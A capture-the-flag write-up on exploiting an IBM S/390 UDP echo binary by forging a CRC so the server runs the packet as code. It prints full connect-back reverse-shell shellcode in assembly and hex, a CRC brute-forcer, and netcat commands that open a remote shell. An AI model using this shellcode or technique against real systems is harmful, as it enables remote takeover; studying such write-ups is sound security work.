Intro
The task has been solved by jagger and mak, both members of the Dragon Sector.
It's a typical example of the 'pwn' category. You can download the server-side binary
here.
$ file zpwn
zpwn: ELF 64-bit MSB executable, IBM S/390, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.4, BuildID[sha1]=0xe1d81c88df9d4f618417bd2ebd037ea74dd1da97, stripped
The emulator
So, it's a
S390/Linux binary. The S390 is a CPU arch created for the IBM System Z machines. Our team's funds were not enough to buy a real IBM System Z :) so we had to use an emulator. And the only viable option at the time was
Hercules. After installing the hercules package (it comes with Ubuntu) we also had to install some Linux OS flavor, and we chose
Debian 7.4 (for s390x), even though the original binary seemed to be compiled under SUSE (it left some SUSE specific sections in the zpwn ELF). If you're interested on how to get your own Debian on IBM System Z, please take a look at
this excellent step-by-step guide. Configuration and installation process is slow & painful, but once we had the emulator running we thought that we were ready to go...
... but not so fast. The kernel that comes together with Debian 7.4 (3.2.sth) had a nasty bug in the ptrace() kernel-mode implementation, which prevented it from being used with gdb. It threw a few errors and exited when saving registers of the traced process. So, we had to upgrade the kernel with the newest .deb we could find on ze Internets (it's one of the newer Debian builds) and it was one of the 3.12 version releases.
|
The hercules s390x emulator |
Recon
A quick objdump over the binary tells us that it's essentially an echo server, which loops constantly, performing
recvfrom(fd, buf, &len, &from) and
sendto(fd, buf, len, &from);...... but not only that.... There's this peculiar procedure which computes some sort of hash/CRC over the data sent via the UDP socket (it's an unconnected one, which is important). And, in case this CRC equals to some predefined value, it jumps directly into the buffer mmap'd previously with
PROT_READ|PROT_WRITE|PROT_EXEC permission bits. At this point, we started to understand how to obtain RCE. The following disassm shows us the data receiving and hash/CRC computing procedures dumped from the zpwn binary.
- ; recvfrom data from the UDP socket into the RWE buffer (address in %r11)
- 80000b42: c0 e5 ff ff fe 51 brasl %r14,800007e4 <recvfrom@plt>
- .../* error checking */
- ; move RXE mmap'd buffer adress to %r5
- 80000b54: b9 04 00 5b lgr %r5,%r11
- ; ini %r2 with -1
- 80000b58: a7 28 ff ff lhi %r2,-1
- ; copy number of chars in the buffer to %r3
- 80000b5c: b9 04 00 34 lgr %r3,%r4
- ; loop until %r3 == 0 (condition at 0x80000b7c)
- ; load character from buf[index] to %r1
- 80000b60: 43 10 50 00 ic %r1,0(%r5)
- ; incement %r5 - now it points to the next char
- 80000b64: 41 50 50 01 la %r5,1(%r5)
- ; compute CRC/HASH - XORs and SHIFTs mostly
- 80000b68: 17 12 xr %r1,%r2
- 80000b6a: 88 20 00 08 srl %r2,8
- 80000b6e: b9 84 00 11 llgcr %r1,%r1
- 80000b72: eb 11 00 02 00 0d sllg %r1,%r1,2
- 80000b78: 57 21 c0 00 x %r2,0(%r1,%r12)
- 80000b7c: a7 37 ff f2 brctg %r3,80000b60
- ; if %r2 == -201528 jump to 0x80000bae
- 80000b80: c2 2d ff fc ec c8 cfi %r2,-201528
- 80000b86: a7 84 00 14 je 80000bae
- ....
- ; Jump directly to the buffer holding our data (%r11)
- 80000bae: 0d eb basr %r14,%r11
So, in order to get RCE, we had to provide our shell-code as the UDP echo packet, and make sure that the CRC computed over it will be equal to -201528. The hash itself is 32 bit in size, so it should be trivial to brute-force it. But, we had to develop our shell-code first.
Shellcode
So, the echo was performed over an unconnected UDP socket, and we couldn't use it for our nefarious purposes (it'd require too much coding IMO), so we had to develop sth. that will either bind a socket and listens to our connections or connects back to our server. The following shellcode implements the latter idea (as it's one syscall less to code)
Pseudocode
- s = socket(AF_INET, SOCK_STREAM, 0);
- connect(s, {IP1.IP2.IP3.IP4/8738}, 16);
- dup2(s, 0);
- dup2(s, 1);
- dup2(s, 2);
- execv(“/bin/sh”, NULL, NULL);
I see you're amazed by the quality of the shell-code below :). Well, something that had to be implemented w/o knowing the assembler and its opcodes beforehand. So it's grossly inefficient. Learning new asm on the go is what haxors like the best, no? :) It's also more complicated than it should be because the network syscalls (socket, connect) are implemented on Linux/s390x via the socketcall() multiplexer which takes all args on the stack and not in registers (what would be considerably faster to implement).
- asm (
- "mvi 0(%r15), 0\n"
- "mvi 1(%r15), 0\n"
- "mvi 2(%r15), 0\n"
- "mvi 3(%r15), 0\n"
- "mvi 4(%r15), 0\n"
- "mvi 5(%r15), 0\n"
- "mvi 6(%r15), 0\n"
- "mvi 7(%r15), 2\n" ; AF_INET
- "mvi 8(%r15), 0\n"
- "mvi 9(%r15), 0\n"
- "mvi 10(%r15), 0\n"
- "mvi 11(%r15), 0\n"
- "mvi 12(%r15), 0\n"
- "mvi 13(%r15), 0\n"
- "mvi 14(%r15), 0\n"
- "mvi 15(%r15), 1\n" ; SOCK_STREAM
- "mvi 16(%r15), 0\n"
- "mvi 17(%r15), 0\n"
- "mvi 18(%r15), 0\n"
- "mvi 19(%r15), 0\n"
- "mvi 20(%r15), 0\n"
- "mvi 21(%r15), 0\n"
- "mvi 22(%r15), 0\n"
- "mvi 23(%r15), 0\n" ; IPPROTO_IP
- "la %r3,0(%r15)\n"
- "la %r2, 1\n"
- "la %r1, 102\n"
- ; socketcall - SYS_SOCKET(AF_INET(2), SOCK_STREAM(1), IPPROTO_IP(0));
- "svc 102\n"
- "lgr %r6, %r2\n"
- "mvi 64(%r15), 0\n"
- "mvi 65(%r15), 2\n" ; AF_INET
- "mvi 66(%r15), 34\n" ; port (8738 = (34*256)+34)
- "mvi 67(%r15), 34\n"
- "mvi 68(%r15), D\n" ; our IP
- "mvi 69(%r15), C\n"
- "mvi 70(%r15), B\n"
- "mvi 71(%r15), A\n"
- "stg %r6, 0(%r15)\n"
- "la %r4, 64(%r15)\n"
- "stg %r4, 8(%r15)\n"
- "mvi 16(%r15), 0\n"
- "mvi 17(%r15), 0\n"
- "mvi 18(%r15), 0\n"
- "mvi 19(%r15), 0\n"
- "mvi 20(%r15), 0\n"
- "mvi 21(%r15), 0\n"
- "mvi 22(%r15), 0\n"
- "mvi 23(%r15),16\n" ; sizeof(struct sockaddr_in)
- "la %r3,0(%r15)\n"
- "la %r2, 3\n"
- "la %r1, 102\n"
- ; socketcall - SYS_CONNECT(fd, {AF_INET, "A.B.C.D", "8738"}, 16);
- "svc 102\n"
- "la %r1,63\n"
- "lgr %r2,%r6\n"
- "la %r3,0\n"
- ; dup2(fd, 0);
- "svc 63\n"
- "la %r1,63\n"
- "lgr %r2,%r6\n"
- "la %r3,1\n"
- ; dup2(fd, 1);
- "svc 63\n"
- "la %r1,63\n"
- "lgr %r2,%r6\n"
- "la %r3,2\n"
- ; dup2(fd, 2);
- "svc 63\n"
- "mvi 0(%r15),'/'\n"
- "mvi 1(%r15),'b'\n"
- "mvi 2(%r15),'i'\n"
- "mvi 3(%r15),'n'\n"
- "mvi 4(%r15),'/'\n"
- "mvi 5(%r15),'s'\n"
- "mvi 6(%r15),'h'\n"
- "mvi 7(%r15),0\n"
- "la %r1,11\n"
- "lgr %r2,%r15\n"
- "la %r3,0\n"
- "la %r4,0\n"
- ; execve("/bin/sh", 0, 0);
- "svc 11\n"
- );
In hex it looks like the following (modulo our IP which is represented by IP1..IP4 bytes).
- "\x92\x00\xf0\x00\x92\x00\xf0\x01\x92\x00\xf0\x02\x92\x00\xf0\x03"
- "\x92\x00\xf0\x04\x92\x00\xf0\x05\x92\x00\xf0\x06\x92\x02\xf0\x07"
- "\x92\x00\xf0\x08\x92\x00\xf0\x09\x92\x00\xf0\x0a\x92\x00\xf0\x0b"
- "\x92\x00\xf0\x0c\x92\x00\xf0\x0d\x92\x00\xf0\x0e\x92\x01\xf0\x0f"
- "\x92\x00\xf0\x10\x92\x00\xf0\x11\x92\x00\xf0\x12\x92\x00\xf0\x13"
- "\x92\x00\xf0\x14\x92\x00\xf0\x15\x92\x00\xf0\x16\x92\x00\xf0\x17"
- "\x41\x30\xf0\x00\x41\x20\x00\x01\x41\x10\x00\x66\x0a\x66\xb9\x04"
- "\x00\x62\x92\x00\xf0\x40\x92\x02\xf0\x41\x92\x22\xf0\x42\x92\x22"
- "\xf0\x43\x92\IP1\xf0\x44\x92\IP2\xf0\x45\x92\IP3\xf0\x46\x92\IP4"
- "\xf0\x47\xe3\x60\xf0\x00\x00\x24\x41\x40\xf0\x40\xe3\x40\xf0\x08"
- "\x00\x24\x92\x00\xf0\x10\x92\x00\xf0\x11\x92\x00\xf0\x12\x92\x00"
- "\xf0\x13\x92\x00\xf0\x14\x92\x00\xf0\x15\x92\x00\xf0\x16\x92\x10"
- "\xf0\x17\x41\x30\xf0\x00\x41\x20\x00\x03\x41\x10\x00\x66\x0a\x66"
- "\x41\x10\x00\x3f\xb9\x04\x00\x26\x41\x30\x00\x00\x0a\x3f\x41\x10"
- "\x00\x3f\xb9\x04\x00\x26\x41\x30\x00\x01\x0a\x3f\x41\x10\x00\x3f"
- "\xb9\x04\x00\x26\x41\x30\x00\x02\x0a\x3f\x92\x2f\xf0\x00\x92\x62"
- "\xf0\x01\x92\x69\xf0\x02\x92\x6e\xf0\x03\x92\x2f\xf0\x04\x92\x73"
- "\xf0\x05\x92\x68\xf0\x06\x92\x00\xf0\x07\x41\x10\x00\x0b\xb9\x04"
- "\x00\x2f\x41\x30\x00\x00\x41\x40\x00\x00\x0a\x0b\x6d\x6f\x85\x48"
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
You may ask, why so many "A"s at the end of the shell-code? The answer is, that there was some peculiar routing problem between our team's machines and the CTF setup, that prevented delivering UDP packets of sizes between ca. 120 and 520 bytes (tested from a few networking locations), so we had to artificially extend it to >600 bytes. Wicked, we know! But well :)
CRC
Now, we have our shellcode, but the CRC over it will not be the magic value, so let's append it with 4 bytes of data, and brute-force it. We need to get 0xfffcecc8 (-201528) in the result (%r2) register, and as this CRC goes sequentially over data in the buffer we can pre-compute the hash for the original shell-code payload, it'll make the whole procedure much quicker (here represented by uint64_t st = 0xffffffff8ec7938c). It's possible to represent it in pure C, and although it's quite easily doable giving, "more-or-less",....
while(%r3--) { %r1 = input ^ %2; %r2 = (%r2>>8) ^ (0x80000d7c[(%r1 & 0xff) << 2]; input++}
... hackers gonna hack, so we simply replicated the original code with asm inlines:
- #include <stdio.h>
- #include <stdint.h>
- #include <stdlib.h>
- int main(void) {
- uint64_t st = 0xffffffff8ec7938c; // Initial CRC of our SC
- uint64_t comp;
- uint8_t sc[4];
- uint32_t *p2 = sc;
- // 1kB of data from the zpwn binary, dumped with gdb's
- // "dump binary memory", it's used by the CRC algorithm
- // as a random data table (addr held in %r12)
- uint8_t *tablica =
- "\x00\x00\x00\x00\x77\x07\x30\x96\xee\x0e\x61\x2c\x99\x09\x51\xba"
- ......
- "\xb4\x0b\xbe\x37\xc3\x0c\x8e\xa1\x5a\x05\xdf\x1b\x2d\x02\xef\x8d"
- "\x01";
- sc[0] = 0;
- sc[1] = 0;
- sc[2] = 0;
- sc[3] = 0;
- uint64_t cnt = 0;
- for(;;) {
- cnt++;
- *p2 = (*p2)++;
- asm(
- " lgr %%r2, %1\n"
- " lgr %%r5, %2\n"
- " lgr %%r12, %3\n"
- " la %%r3, 4\n"
- " la %%r1, 0\n"
- "label1:\n"
- " ic %%r1,0(%%r5)\n"
- " la %%r5,1(%%r5)\n"
- " xr %%r1,%%r2\n"
- " srl %%r2,8\n"
- " .long 0xb9840011\n" ; llgrc %r1, %r1
- " sllg %%r1,%%r1,2\n"
- " x %%r2,0(%%r1,%%r12)\n"
- " brctg %%r3,label1\n"
- " lgr %0, %%r2\n"
- : "=r" (comp)
- : "r" (st), "r" (sc), "r" (tablica)
- : "r1", "r2", "r3", "r5", "r12"
- );
- if (comp == 0xfffcecc8 || comp == 0xfffffffffffcecc8) {
- // GOTCHA
- printf("==> %hhx %hhx %hhx %hhx\n", sc[0], sc[1], sc[2], sc[3]);
- printf("==> %x\n", *p2);
- break;
- }
- if ((cnt % 1000000) == 0) {
- printf("CNT: %llu\n", cnt);
- }
- }
- return 0;
- }
After the not-so-quick brute-forcing session (~30 min.) using the emulator, we got the last 4 bytes of the payload ("\x42\x82\xe7\xc5") for this specific shell-code.
PWN
Now, let's save the shell-code as a file, append those 4 bytes, and send it using netcat.
# Client
$ cat sc | nc -u <serverip> 31337
# Listen on server for the back-connect
$ nc -l -v 8738
Connection from 109.233.61.11 port 8738 [tcp/*] accepted
id
uid=1000(zpwn) gid=1000(zpwn) groups=1000(zpwn),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
Voila! Let's grab the flag (from flag.txt) and move over to other tasks.